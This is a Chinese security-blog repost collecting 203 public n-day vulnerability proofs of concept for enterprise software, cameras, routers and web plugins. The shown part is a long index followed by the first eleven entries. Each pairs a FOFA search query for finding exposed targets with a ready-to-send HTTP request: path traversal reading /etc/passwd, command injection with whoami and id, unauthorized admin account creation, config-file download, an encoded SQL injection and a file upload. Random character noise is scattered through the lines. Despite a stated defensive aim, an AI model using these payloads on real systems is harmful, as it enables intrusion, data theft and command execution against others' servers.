互联网公开漏洞整理202309-202406
1 _! W5 c8 k: q Y: T- w( G% g道一安全 2024-06-05 07:41 北京) r- F# w& q* a# i2 C
以下文章来源于网络安全新视界 ,作者网络安全新视界4 U# D, J+ C- q: X( E
# _3 i& J2 W) E* T# J$ Z+ k
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。' K6 m8 o# S0 q9 ^
. [% ?4 ^8 I3 u
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
9 `: ?/ H' b4 Q" _/ A/ z; A, S
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。0 a$ d! c0 W$ B
; D0 x, W6 Y: U文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。% v+ [' M$ l6 h2 B
, M9 s$ h- c1 t) t
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。. ^! I; T, U X. g) d. n
, e2 Z, n+ s! }! W5 f" L9 ^9 u
8 _7 a: u. A! Q声明1 z9 p1 Z" O. i+ ^" u9 g
, q; ^2 n4 k8 @: Y) x为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。: v4 F5 y {" O
& v: {8 r; E8 \2 i! K) n
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
Z2 ], `$ p3 o/ b3 M I1 I% R7 P" L" E6 E) S$ _9 C, K
# I H" {4 ?/ ^1 \$ l+ s N4 b2 Y I+ ]' }9 i
目录( T% H, J5 {5 [" Z8 q- j% M* |
+ C, z/ \" @2 M: E1 [# [
01
' F6 ^6 M: I+ [% p/ D
& W2 v6 u$ I7 r# @+ \4 s7 R d1. StarRocks MPP数据库未授权访问
$ o- L- E/ r- e2 d$ { E2. Casdoor系统static任意文件读取# y9 \. k/ q( l1 A" _
3. EasyCVR智能边缘网关 userlist 信息泄漏
& H5 e" U4 J, ]6 R0 b e5 Y4. EasyCVR视频管理平台存在任意用户添加2 u- L" p U: V8 F1 ]/ t" F
5. NUUO NVR 视频存储管理设备远程命令执行
+ B h/ u7 W/ |' ~2 u" f6. 深信服 NGAF 任意文件读取/ ]; b3 J5 N+ e
7. 鸿运主动安全监控云平台任意文件下载
_7 ~: e; ?' \4 G8. 斐讯 Phicomm 路由器RCE
8 D4 C4 U3 d: r) h* i) ]0 I9. 稻壳CMS keyword 未授权SQL注入- w" f( }$ h, n( b' u$ ]+ `
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
0 k9 x7 o7 O3 ?# P% v11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 o) d7 H' M5 I8 [12. Jorani < 1.0.2 远程命令执行
( Q) K9 V/ r' P% U! o5 g) P3 q13. 红帆iOffice ioFileDown任意文件读取
4 i1 o! b! l0 o9 Q1 a14. 华夏ERP(jshERP)敏感信息泄露
: n- s5 \3 |, c6 M# p+ l" S15. 华夏ERP getAllList信息泄露
7 a6 p/ Y3 m5 {# P9 C, z# S9 u16. 红帆HFOffice医微云SQL注入
' p9 r, v2 J* I% L# }* C* Z* K17. 大华 DSS itcBulletin SQL 注入/ d. {9 t% F& k+ r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 u1 O* J2 u. |4 U19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- A& p; C0 O$ @: N
20. 大华ICC智能物联综合管理平台任意文件读取( m# R$ w/ p) }( @& O5 p2 V
21. 大华ICC智能物联综合管理平台random远程代码执行
9 @) s) z/ c' S0 a1 M2 W/ d" M22. 大华ICC智能物联综合管理平台 log4j远程代码执行) u8 `/ Z: l1 I$ f! [
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行( G, Z* P" c9 N M1 f$ i" c
24. 用友NC 6.5 accept.jsp任意文件上传
8 h6 K4 ~/ M# H$ ~& ?; o25. 用友NC registerServlet JNDI 远程代码执行, l* E! X' g5 Z5 R) c2 e1 _0 i* W
26. 用友NC linkVoucher SQL注入
6 w% I* p! F4 e2 c4 g. f; U0 U27. 用友 NC showcontent SQL注入
( a. H* A8 F8 ]28. 用友NC grouptemplet 任意文件上传3 b$ B! c1 ~" `! I0 _5 W+ t8 H) l
29. 用友NC down/bill SQL注入
1 }# Z: y* [$ }! A. G30. 用友NC importPml SQL注入
! a, V- C- @. f A+ e+ u0 B! ^31. 用友NC runStateServlet SQL注入
. }! P' k9 w! S# n% X0 I8 c32. 用友NC complainbilldetail SQL注入
4 J2 D( c' M; T( r: S33. 用友NC downTax/download SQL注入3 E# ?9 e2 u) q: d7 M2 U
34. 用友NC warningDetailInfo接口SQL注入3 c) v+ L9 i; ^& i- {* i$ k; E2 U
35. 用友NC-Cloud importhttpscer任意文件上传2 N3 F8 i. d2 r/ d, d" V& a$ q: U
36. 用友NC-Cloud soapFormat XXE
" [+ H+ y5 m. X! Z( q, d2 q5 q# W37. 用友NC-Cloud IUpdateService XXE/ \9 t+ H9 c- N4 S, f
38. 用友U8 Cloud smartweb2.RPC.d XXE
% C9 P- D2 P- {39. 用友U8 Cloud RegisterServlet SQL注入) m: o6 Y. `" }4 Q; E) q
40. 用友U8-Cloud XChangeServlet XXE: l! ?4 ?. u# n8 i [3 a- }! ~
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入+ l% P7 [: }, ?7 h& j
42. 用友GRP-U8 SmartUpload01 文件上传
: T* P/ w/ V& l9 C43. 用友GRP-U8 userInfoWeb SQL注入致RCE8 F$ r# k/ } `# p* F( r
44. 用友GRP-U8 bx_dj_check.jsp SQL注入" `" h9 _; @7 p. T7 m( d0 e* K
45. 用友GRP-U8 ufgovbank XXE+ X% Z9 P" q) q1 m) H3 e: t" Y: O( E
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
8 E, n# ~" Z) h1 J47. 用友GRP A++Cloud 政府财务云 任意文件读取8 ?7 O) ]% r8 C
48. 用友U8 CRM swfupload 任意文件上传
" e1 j; z' I* F! r* t49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 s+ n" B! h2 I! h6 Z6 o50. QDocs Smart School 6.4.1 filterRecords SQL注入
; Q3 W! ]+ V5 e51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
' k5 B7 U0 q8 V. k0 u* N: F52. 泛微E-Office json_common.php sql注入
) D, W$ m( b* H& {. j/ R% w; h53. 迪普 DPTech VPN Service 任意文件上传
. ~: u4 t% l( s3 f54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 A2 z9 l$ K) o, o% s: `: W55. 畅捷通T+ getdecallusers信息泄露
$ {& v5 \5 ?" y4 k. a0 x# {7 `6 L1 m; U56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* j1 c, M0 X4 p' x/ @& [
57. 畅捷通T+ keyEdit.aspx SQL注入2 g+ l: ]% y1 p% W, P, J: S
58. 畅捷通T+ KeyInfoList.aspx sql注入
8 @# b5 o3 U3 n$ P8 y6 m4 [59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行6 Y4 m) m8 b# i: G8 r* C
60. 百卓Smart管理平台 importexport.php SQL注入
7 {6 u& L# G' s61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
% j1 P4 ^" S* p1 j: L62. IP-guard WebServer 远程命令执行) `1 I4 T4 L$ n; \) ~9 M* N. B9 e
63. IP-guard WebServer任意文件读取, j2 D' E9 M% s/ A( Z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
- n5 N0 v# w7 `$ C/ \; c( j65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% h' E$ i2 m2 }; m. q% B R. J% f! O
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& x0 [/ U$ I3 I2 N67. 万户ezOFFICE wpsservlet任意文件上传
! P- `3 J0 u$ f0 B* m! s) z( Z68. 万户ezOFFICE wf_printnum.jsp SQL注入
+ ~ r: D* v5 Q; [) R4 n( d5 Z \/ a69. 万户 ezOFFICE contract_gd.jsp SQL注入
+ i% V2 \4 C, m* j70. 万户ezEIP success 命令执行
0 M- S5 `6 C1 Y* y' o. E; h% ^1 A71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 F. p( B" H0 ]- {72. 致远OA getAjaxDataServlet XXE0 r+ ?3 L- u, |* |/ f
73. GeoServer wms远程代码执行
* M' t4 l3 }" q) h: o" @74. 致远M3-server 6_1sp1 反序列化RCE
' A4 X0 ~+ G$ |3 s' E! v) ~7 h# d75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 A ?8 O- J3 U5 ~6 I7 Q5 ~
76. 新开普掌上校园服务管理平台service.action远程命令执行
* R* Q$ v0 s; ~3 G4 e77. F22服装管理软件系统UploadHandler.ashx任意文件上传
% e7 R, m9 Q, n+ V/ J/ G3 G78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
* i3 R. C( p' }& q5 p79. BYTEVALUE 百为流控路由器远程命令执行
# P1 `8 L, }8 F8 x- [/ b. A80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
% U5 Q2 ]* H. i" g8 I( I& J81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
, p: K: h$ M" x- z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, x' a% V8 Q0 n. ?: c2 j: M0 J6 \& u83. JeecgBoot testConnection 远程命令执行
6 z( o+ n+ I+ K5 Q6 d# l84. Jeecg-Boot JimuReport queryFieldBySql 模板注入: {5 n5 W, N/ D8 H0 C- o+ J
85. SysAid On-premise< 23.3.36远程代码执行0 O' L) p- R- O9 i% N
86. 日本tosei自助洗衣机RCE
; O# ~" ]. e" h! S0 B( @87. 安恒明御安全网关aaa_local_web_preview文件上传
8 u& {8 j6 z3 p$ I6 j5 b4 x. L88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行' j$ t: ^; {2 Q" ~7 p4 J' @
89. 致远互联FE协作办公平台editflow_manager存在sql注入% w: e7 ~1 T% }8 c& e
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行; V4 b3 l) z4 w+ F7 Z
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
* g3 F. f( S# G. a& I8 J% o92. 海康威视运行管理中心session命令执行
" T$ S+ T9 r: }93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
' _. Q0 r8 S4 p0 \$ r# q4 _ @( m94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传3 H9 l( ^: n; ?1 S1 b/ {% e
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行5 k1 X, D) _5 |: g7 f
96. Apache OFBiz 18.12.11 groovy 远程代码执行
. t( {! F$ ~9 }. x6 T* _' I! ]97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
9 N$ ?) r' o8 H98. SpiderFlow爬虫平台远程命令执行
! A* ]: y3 [# o99. Ncast盈可视高清智能录播系统busiFacade RCE
6 H' \5 F. \& ^+ `" W, t# U3 M5 Y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( u+ Q8 X6 m: x' V U+ G) [
101. ivanti policy secure-22.6命令注入 R% y4 N% e3 Q9 K! m5 |
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 R8 \; Q: [ z5 S103. Ivanti Pulse Connect Secure VPN XXE9 P1 V3 k& }0 |3 N. A& p7 p$ q% t/ c
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露% n3 b, v) G) | _" G
105. SpringBlade v3.2.0 export-user SQL 注入& V C6 Y; U* X
106. SpringBlade dict-biz/list SQL 注入
; g6 L. V1 w K3 Q107. SpringBlade tenant/list SQL 注入" h- f- D5 |2 p: Y7 @" N
108. D-Tale 3.9.0 SSRF) a5 X; n) n; |. e6 U( Y. \
109. Jenkins CLI 任意文件读取+ Q' E( a9 y3 P0 i9 x& A$ W
110. Goanywhere MFT 未授权创建管理员7 O7 q" K0 ` |- F& S6 w
111. WordPress Plugin HTML5 Video Player SQL注入
$ U" e2 R! [2 v) ~- M6 R112. WordPress Plugin NotificationX SQL 注入$ L9 T6 x/ w+ p; j2 }6 Y3 X
113. WordPress Automatic 插件任意文件下载和SSRF
, A' [8 G4 c& x f- M114. WordPress MasterStudy LMS插件 SQL注入+ H) ~) s8 ?3 X$ H
115. WordPress Bricks Builder <= 1.9.6 RCE% }) R5 Q7 z7 U8 r( t2 X
116. wordpress js-support-ticket文件上传& d4 q, l! j8 Y6 j+ G% L2 E4 d
117. WordPress LayerSlider插件SQL注入* n7 c( ~9 t1 u3 ]; w9 M. E/ `
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
|; B% y: j6 r# h4 ?) u5 [119. 北京百绰智能S20后台sysmanageajax.php sql注入
( c8 T! n* N. B5 b( e" w u120. 北京百绰智能S40管理平台导入web.php任意文件上传4 ?( u+ k6 L( R: E6 T
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) m- ]- X, b- G0 K: U122. 北京百绰智能s200管理平台/importexport.php sql注入* C. @2 q1 B3 k/ A" i
123. Atlassian Confluence 模板注入代码执行( _# [2 w# E: |& C* v; h8 @
124. 湖南建研工程质量检测系统任意文件上传
, }3 u7 _6 x! N125. ConnectWise ScreenConnect身份验证绕过
* Q1 Z X' D% [126. Aiohttp 路径遍历5 s4 ]' @* T0 F/ X; x. l9 K
127. 广联达Linkworks DataExchange.ashx XXE1 \. U$ j4 @$ j: N, H2 D& z o* c4 V
128. Adobe ColdFusion 反序列化" ?9 W! ~. f+ K1 W
129. Adobe ColdFusion 任意文件读取8 b7 @: w" P; B& q% ^
130. Laykefu客服系统任意文件上传: i {8 ~, }& x0 f
131. Mini-Tmall <=20231017 SQL注入! Z. T5 W" u0 A& Q( f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
' x/ c) j$ s, H% G133. H5 云商城 file.php 文件上传2 ] n% k; p$ E( H
134. 网康NS-ASG应用安全网关index.php sql注入
' \ c6 C. _! d, J, s4 x6 z135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 y1 ]/ Y* }: C) x7 U( S2 m. X# D136. NextChat cors SSRF% Z' d- t! T. S/ H0 e t C: _
137. 福建科立迅通信指挥调度平台down_file.php sql注入
1 \0 \% ?# O# X% y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
]0 o0 C) o$ ~6 V9 b5 D" j139. 福建科立讯通信指挥调度平台editemedia.php sql注入
. S; U+ X) Q8 u9 N; j140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入0 i# @. o+ H3 v
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 ~& S7 b# M6 X3 C+ F
142. CMSV6车辆监控平台系统中存在弱密码
) G7 O' M8 E2 w, V143. Netis WF2780 v2.1.40144 远程命令执行7 s n. M9 f; @* L: O
144. D-Link nas_sharing.cgi 命令注入5 y2 g' f& X* t5 \
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入+ U( _! n4 S% q* R' n3 ?! o' U) {
146. MajorDoMo thumb.php 未授权远程代码执行
- D, `( e1 `) F147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
) m- D. C% W7 H148. CrushFTP 认证绕过模板注入# B0 B) D1 K4 u$ }# O* _
149. AJ-Report开源数据大屏存在远程命令执行
; V7 }0 c, p- v* C2 ]+ s150. AJ-Report 1.4.0 认证绕过与远程代码执行9 w6 j+ u2 N- J
151. AJ-Report 1.4.1 pageList sql注入6 Q1 m3 y0 N3 K4 H. v* V& \) F
152. Progress Kemp LoadMaster 远程命令执行3 {3 _* r9 Q' e) S! b$ k
153. gradio任意文件读取
A8 c4 y/ z* o- N7 F154. 天维尔消防救援作战调度平台 SQL注入0 Q" N1 U* `& `+ v( |1 o
155. 六零导航页 file.php 任意文件上传
; A3 `6 b c2 `# ?156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 W( [( O1 e2 F& u" v) N157. 美特CRM upload.jsp 任意文件上传6 d1 n: y* }2 {) L2 q
158. Mura-CMS-processAsyncObject存在SQL注入
0 p5 A: k, ?" ?9 D v159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传/ D: s7 O# P% A" Z9 N4 g% }) h
160. Sonatype Nexus Repository 3目录遍历与文件读取
, m7 @( ?9 s5 [. ^6 r1 V161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 r# D6 c5 y( K; C( m162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传& r* ~0 |' W$ ^; y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 `5 W) \! v, M3 ~4 o( }+ P
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* y$ f7 s1 Z: ^) _- Q. r
165. OrangeHRM 3.3.3 SQL 注入& S& ^' h$ M5 y% k0 }+ W4 L
166. 中成科信票务管理平台SeatMapHandler SQL注入* P8 R) j3 ~- _$ ?8 k
167. 精益价值管理系统 DownLoad.aspx任意文件读取' H" n7 C6 d% S G
168. 宏景EHR OutputCode 任意文件读取
( J' i2 @1 M: c5 t169. 宏景EHR downlawbase SQL注入
. `" U9 `3 G' f! q170. 宏景EHR DisplayExcelCustomReport 任意文件读取" z) [6 [& \/ Z8 l
171. 通天星CMSV6车载定位监控平台 SQL注入4 V. y' J$ Y& W. V1 X& Y
172. DT-高清车牌识别摄像机任意文件读取) r% c! L+ j1 I1 O- J) Q
173. Check Point 安全网关任意文件读取
8 P7 a- {- e1 M3 s, x174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 R8 r$ r! @: X) b
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- o* K: U% s0 h1 {( w$ P
176. 电信网关配置管理系统 rewrite.php 文件上传
; A4 J, ]2 J- x T1 w+ `5 b177. H3C路由器敏感信息泄露
7 x+ t' F4 K a+ b178. H3C校园网自助服务系统-flexfileupload-任意文件上传4 [; p1 D) g4 O
179. 建文工程管理系统存在任意文件读取
0 k' D- x1 H7 y* G& Y! J: e( J180. 帮管客 CRM jiliyu SQL注入/ Q9 j/ m# R- r6 T5 X
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; F5 E# ~/ R' ~
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: i W2 v( ]9 P% K! P+ q( L, t% y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入) J: m$ {) c. \; ]0 G
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加0 n! T( I: N+ j# m N0 t* S
185. 瑞友天翼应用虚拟化系统SQL注入
6 Y t C- {! t186. F-logic DataCube3 SQL注入4 M8 Y1 j* Y5 Q. K7 R; v6 |
187. Mura CMS processAsyncObject SQL注入7 r! _' ]) S. i8 {% x
188. 叁体-佳会视频会议 attachment 任意文件读取
( U* \! r% g& E6 T! Z189. 蓝网科技临床浏览系统 deleteStudy SQL注入: ^7 q- K0 H) y) e
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
v4 t- V8 ~$ c3 {# y191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
3 }* h# V& s% m1 I( U192. 富通天下外贸ERP UploadEmailAttr 任意文件上传0 j6 N- v+ L2 d. @5 P1 f
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! W. R* u8 T# n
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) h6 i5 q* V" j6 u# W195. 飞鱼星上网行为管理系统 send_order.cgi命令执行! t4 f1 J: f6 W6 [- G
196. 河南省风速科技统一认证平台密码重置
8 K: j y- n1 S8 _9 \197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
& O+ S9 M( f. _' n, W! Z198. 阿里云盘 WebDAV 命令注入
' Z. ?* [& X0 ?* i2 p' ?199. cockpit系统assetsmanager_upload接口 文件上传* ]1 I) X u. b8 Y2 l
200. SeaCMS海洋影视管理系统dmku SQL注入6 \' D2 T, c: |$ x- ?5 c
201. 方正全媒体新闻采编系统 binary SQL注入
1 q4 Q2 h0 d' E( \202. 微擎系统 AccountEdit任意文件上传
* N1 ]( [( y: o+ d" {$ U( P203. 红海云EHR PtFjk 文件上传
7 s) Q8 T( N. h* _. c/ E2 f$ y, F4 |& I- g7 o
POC列表% O+ U9 Q2 @) t; f4 @. Q6 y
- q3 h* M0 @1 p# h, ]" m
021 r/ w% G9 D/ Q8 U1 q
$ I2 ?1 T7 o& u1 h+ v1. StarRocks MPP数据库未授权访问
" r5 Q. x# o( x# P# I6 e" }1 vFOFA :title="StarRocks"
! l" l9 f$ x: j1 t( P1 u. TGET /mem_tracker HTTP/1.1' W: G8 l% t! [7 F# V) y
Host: URL
. ~% C7 R4 z$ ~ L8 \ Z& B3 Q' j8 X* l4 S4 m3 e9 ]. n
/ `) _% u/ V+ ~9 a+ J. g4 e3 J0 P
2. Casdoor系统static任意文件读取) w3 f: L3 t: l
FOFA :title="Casdoor"4 I+ g3 U$ V4 L( R% S& H/ Q" d t
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
3 V4 c: A% X. I3 r( W$ G* h" W, v5 BHost: xx.xx.xx.xx:99992 @/ y/ Q& h! M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% x" }/ W/ n- N1 M, D, xConnection: close
- y$ m/ n H$ e" x4 ?& wAccept: */*9 W+ j. k% E$ {$ e' c. V
Accept-Language: en- l; K; k) K, o& E1 H$ I: i$ A
Accept-Encoding: gzip, u9 u' }) Z$ P/ d% v" @
6 [, _: ?' e. {
/ m- g/ T7 I' t- \# I- D3. EasyCVR智能边缘网关 userlist 信息泄漏
! C* \* a% Y! P9 a1 `& aFOFA :title="EasyCVR"
* P' s. J' E& ~4 L' @; m E, tGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
( d, P+ E$ [6 Y5 ~, }6 m# ZHost: xx.xx.xx.xx( C+ v V! q# S! U! j4 F5 d+ |
; B3 d# f+ g$ c' v# C: e% S( k
' F$ Q& }- w% e" J6 u( r4. EasyCVR视频管理平台存在任意用户添加4 q$ W/ }" P& P* F0 i
FOFA :title="EasyCVR"' _: v# |2 ^+ H8 M3 A
+ a- `$ N, w6 rpassword更改为自己的密码md5* E' a f3 b. l/ v k
POST /api/v1/adduser HTTP/1.1
R6 j& A, W! M9 T7 L4 ZHost: your-ip
: ~% ^6 y2 g5 t' a q9 wContent-Type: application/x-www-form-urlencoded; charset=UTF-8- d# r9 g! \0 f, z3 B$ o+ e( { _
& n) W4 A7 q3 C, R _1 I( F! N" Mname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1 s7 h' {. Q: V9 d
8 m- n; {' f' a) S- q
4 u9 e' q2 }3 X4 ^% G
5. NUUO NVR 视频存储管理设备远程命令执行3 D/ ~9 B8 _7 p- ~
FOFA:title="Network Video Recorder Login"
6 X: T4 |0 q( t, {! nGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
7 S5 ]3 `" E, k* V! D G; ]( IHost: xx.xx.xx.xx
5 E, U% r% Q6 |, k2 z
8 ^5 I$ J3 Y( ^' ]
# Q' A. `& j+ e B8 u% Z6. 深信服 NGAF 任意文件读取. G+ Y7 v2 N% ?. B6 N$ v
FOFA:title="SANGFOR | NGAF"4 Z. p' @/ O8 e1 A" c+ G
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1! Q0 j( P) r, u) d
Host:9 F1 Z9 L# L% f O( B/ W
6 f: ~' d% m8 n2 v4 c7 \, @" n
# q; ]' m6 B: T4 Z% l# h0 V
7. 鸿运主动安全监控云平台任意文件下载
. J- ]5 J8 r* z% xFOFA:body="./open/webApi.html"- K- d8 x1 p" H
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.10 F y5 U5 S- P5 S# b. [7 z8 ]: Q
Host:
, B7 ?! r% v- v# e% @- C, Q- M3 z3 S/ \
3 I3 d2 K- I' H6 A$ I9 e7 g3 O8. 斐讯 Phicomm 路由器RCE4 R9 m4 W K8 T8 F7 B: N: C
FOFA:icon_hash="-1344736688"
; y y3 M5 Z" s, G ? m$ \默认账号admin登录后台后,执行操作, ^" _) l% j R6 O
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.11 \6 n, F+ U0 L
Host: x.x.x.x
# N4 j/ L( _* @! A: v1 q0 Y. y& L' CCookie: sysauth=第一步登录获取的cookie
' c0 k+ N% f. e- _5 ^9 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
# k# I3 Q2 b+ ^# ~: HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 C8 z0 q2 i/ y. z K
% d3 {8 y& m3 k* r$ t: U------WebKitFormBoundaryxbgjoytz5 ^! O) d1 [, P! q9 |6 i b: ?* f
Content-Disposition: form-data; name="wifiRebootEnablestatus"" g ?( j$ f H) Q3 [$ i' l
8 Q1 Q9 q& ?8 x: q9 G, h0 r4 X
%s
^& S* D- e1 N; M7 ?( ~$ w------WebKitFormBoundaryxbgjoytz1 w6 ]5 T9 }: o- [1 |' |+ M W9 h1 D
Content-Disposition: form-data; name="wifiRebootrange"( P# B" v( V, W: X2 V
6 y' z) D3 w, B" ~9 E+ B8 Z
12:00; id;; @2 s) h+ u& w: ]- J) _
------WebKitFormBoundaryxbgjoytz
. {- ]2 H' B3 \& C+ D( E1 I8 X) iContent-Disposition: form-data; name="wifiRebootendrange"
. Z+ T( S" [9 P, H) G$ z! G2 z* X9 Q( G! K) i; G! S# _5 s" p" F
%s:! }9 A6 X% z; {% C
------WebKitFormBoundaryxbgjoytz5 r, w1 R6 H/ J f5 I1 f/ |/ \
Content-Disposition: form-data; name="cururl2"
% T8 Z8 O" e1 V2 B$ a* o. k) i3 F# C5 D
+ U8 c, [, E& R3 ?+ q6 g& f: U------WebKitFormBoundaryxbgjoytz--
0 y( F, g# E I, n6 A# V. v8 S2 e3 X2 H2 D; E* p5 M- i n6 x: c0 o
6 t$ g9 `8 @# E% j4 a: ^+ p
9. 稻壳CMS keyword 未授权SQL注入
5 Q V* k. V% qFOFA:app="Doccms"
0 z8 b o9 Q- EGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- s, U; n8 N. n* x$ K4 P3 {Host: x.x.x.x
0 f5 o& h/ z# p2 \
+ ]3 f; T" s T$ k' T% _
5 W5 o+ w' G+ Qpayload为下列语句的二次Url编码
% [/ d! l6 K# V/ P* Y
& h4 A8 y8 v( H( S' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#, R0 g- k+ j) Z9 v4 {, H. e- P; L% ?
7 ]' w$ a( Z6 b1 p6 @10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
; H1 B Y4 \1 ]6 M1 ^$ D1 MFOFA:icon_hash="953405444"
. n& Z }5 e, M" c3 a
# Y1 _' y- r6 E文件上传后响应中包含上传文件的路径+ ^/ J: W- j( [& |% m; i# {+ ~
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
6 @% }1 w( V4 uHost: x.x.x.x:xx
4 R- X, e# l6 w; ^. \, MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 n0 G( [5 v* p* Z ]Content-Length: 1972 u) y1 B$ a# l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ W: X X7 Q; a' @0 L- r1 n; T
Accept-Encoding: gzip, deflate
% e1 s# p4 {9 ~9 ]Accept-Language: zh-CN,zh;q=0.9) W7 F# [3 [0 _
Connection: close
% J s/ r- R) T* R* hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 K# W5 T9 X7 k1 {% L# g# u T2 @, Y! K5 ^% e- l* w) v, {! w
------WebKitFormBoundaryxdgaqmqu9 ^. X1 b0 C9 [3 o0 K
Content-Disposition: form-data; name="file"filename="icfitnya.txt"! [3 ~ e5 U7 L3 v5 ~
Content-Type: text/html
# }6 [5 r! h9 \/ P |4 \) `9 v5 s" l
. b4 e6 X6 m$ @2 K5 A0 Xjmnqjfdsupxgfidopeixbgsxbf/ [: B' v) n6 w
------WebKitFormBoundaryxdgaqmqu--! f3 Z" {8 u) \3 e" M. `
* {2 a8 h$ N B% a9 Z1 B, P5 E6 q: s
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* C) c* G: w" i5 r# [2 E3 ZFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
